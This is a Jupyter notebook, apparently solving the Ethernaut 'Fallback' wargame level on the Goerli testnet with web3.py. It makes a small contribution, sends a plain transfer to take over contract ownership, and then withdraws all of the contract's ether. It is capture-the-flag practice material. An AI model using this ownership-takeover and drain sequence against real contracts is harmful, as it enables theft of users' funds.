In [11]:
from web3 import Web3
import json
from dotenv import load_dotenv
load_dotenv()  # have your sensitive in .env file/ add it to .gitignore to prevent accidental commit to github
import os

In [12]:
rpc_endpoint_address=os.environ.get('GOERLI_RPC')
w3 = Web3(Web3.HTTPProvider(rpc_endpoint_address))
w3.manager.request_blocking
w3.eth.block_number

7904797

In [13]:
# we generate the private key, which we export from metamask
account = w3.eth.account.from_key(os.environ.get('ETHERNAUT_PRIVATE_KEY'))
account.address

'0xE05cCbcbCb088D8Ae063401249366348cf0eD6C4'

In [18]:
abi=json.loads('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"contribute","outputs":[],"stateMutability":"payable","type":"function","payable":true,"signature":"0xd7bb99ba"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"contributions","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function","constant":true,"signature":"0x42e94c90"},{"inputs":[],"name":"getContribution","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function","constant":true,"signature":"0xf10fdf5c"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function","constant":true,"signature":"0x8da5cb5b"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function","signature":"0x3ccfd60b"},{"stateMutability":"payable","type":"receive","payable":true}]')

contract = w3.eth.contract(Web3.toChecksumAddress('0xf464f6a22bf43b062666B488522db4E8fc0bfe41'), abi=abi)

In [ ]:
tx = contract.functions.contribute().buildTransaction({
    'gas': 200000,
    'chainId': 5,
    'from': account.address,
    'nonce': w3.eth.getTransactionCount(account.address),
    'value': w3.toWei(0.0001, 'ether'),
}) 
signed_txn = w3.eth.account.signTransaction(tx, private_key=account.privateKey)
tx_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx_hash

In [21]:
contribution = contract.functions.getContribution().call()
contribution

0

In [23]:
# claim ownership
raw_tx = {
    'gas': 200000,
    'chainId': 5,
    'maxFeePerGas': w3.eth.gas_price,
    'maxPriorityFeePerGas': w3.eth.max_priority_fee,
    'from': account.address,
    'value': 1,
    'nonce': w3.eth.getTransactionCount(account.address),
    'to': Web3.toChecksumAddress('0xf464f6a22bf43b062666B488522db4E8fc0bfe41'),
    } 

signed_tx = w3.eth.account.sign_transaction(raw_tx,account.key)
tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
tx_hash

HexBytes('0x9468760830e08aa77784f48dcd8c2fc6cd42a35ad2402286e6e01454877894cd')

In [24]:
# withdraw all eth
tx = contract.functions.withdraw().buildTransaction({
    'gas': 200000,
    'chainId': 5,
    'from': account.address,
    'nonce': w3.eth.getTransactionCount(account.address),
}) 
signed_txn = w3.eth.account.signTransaction(tx, private_key=account.privateKey)
tx_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction)
tx_hash

HexBytes('0x1ec7a61d20a29436f4362b3c8925079680cf52efa10792091c6a010058124d79')